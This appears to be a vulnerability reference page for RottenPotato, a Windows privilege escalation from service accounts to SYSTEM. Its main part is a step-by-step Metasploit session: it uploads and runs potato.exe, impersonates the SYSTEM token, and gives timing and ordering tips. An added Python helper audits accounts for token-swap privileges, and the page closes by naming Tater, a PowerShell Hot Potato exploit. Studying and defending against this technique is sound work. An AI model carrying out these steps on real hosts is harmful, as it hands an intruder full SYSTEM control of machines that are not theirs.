Vulnerability reference:

RottenPotato

Local Privilege Escalation from Windows Service Accounts to SYSTEM

Example videos

Usage with msf

msf exploit(web_delivery) > set ExitOnSession false
msf exploit(web_delivery) > run
meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter > getprivs
===========================================================
Enabled Process Privileges
===========================================================
 SeAssignPrimaryTokenPrivilege

meterpreter > upload /root/potato.exe C:\\Users\\Public
meterpreter > cd C:\\Users\\Public
meterpreter > use incognito
meterpreter > list_tokens -u
NT AUTHORITY\IUSR

meterpreter > execute -cH -f ./potato.exe
meterpreter > list_tokens -u
NT AUTHORITY\IUSR
NT AUTHORITY\SYSTEM

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Get a shell that holds the SeAssignPrimaryTokenPrivilege privilege (screenshot: iis).

Get SYSTEM privileges (screenshot: potato).


  • It is important to impersonate the token (or run list_tokens -u) quickly after running the binary.
  • It is also important to follow the order of the steps.
  • Make sure you "use incognito" before running the binary.
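The precondition for the steps above is a service account whose token carries SeAssignPrimaryTokenPrivilege. The following audit helper is an added defender-side example, not part of RottenPotato or of this page: it parses `whoami /priv` or meterpreter `getprivs` output and reports whether an account holds a token-swap privilege at all. The inclusion of SeImpersonatePrivilege and both sample outputs are assumptions made here.

```python
"""Audit a Windows token for the privileges the RottenPotato technique depends on."""
from typing import Dict, List

# SeAssignPrimaryTokenPrivilege is the right shown in the getprivs output above;
# SeImpersonatePrivilege is the other right the same token-swap technique can
# use (known about the technique in general, not stated on this page).
TOKEN_SWAP_PRIVS = ("SeAssignPrimaryTokenPrivilege", "SeImpersonatePrivilege")

# Constructed sample in the shape of `whoami /priv` run as an IIS app pool identity.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
"""

# Constructed sample in the shape of the meterpreter `getprivs` output above.
SAMPLE_GETPRIVS = """\
===========================================================
Enabled Process Privileges
===========================================================
 SeAssignPrimaryTokenPrivilege
"""

def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Map privilege -> 'Enabled'/'Disabled'. Each row is 'Name  Description  State';
    the name has no spaces and the state is the last token, so the description is skipped."""
    privs: Dict[str, str] = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs

def parse_getprivs(text: str) -> Dict[str, str]:
    """Map privilege -> 'Enabled' from `getprivs`, which lists only currently enabled privileges."""
    return {p: "Enabled" for p in text.split() if p.startswith("Se") and p.endswith("Privilege")}

def token_swap_risks(privs: Dict[str, str]) -> List[str]:
    """Token-swap privileges the account holds at all. A 'Disabled' privilege is still
    assigned to the token and the process can enable it for itself, so only removing the
    right from the account (Local Security Policy / secedit) counts as a mitigation."""
    return sorted(p for p in TOKEN_SWAP_PRIVS if p in privs)
```

Run it against `whoami /priv` output captured from each service account (IIS app pool identities included); any non-empty result means the account should be reviewed for whether it really needs the right.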

Tater

A PowerShell implementation of the Hot Potato Windows privilege escalation exploit.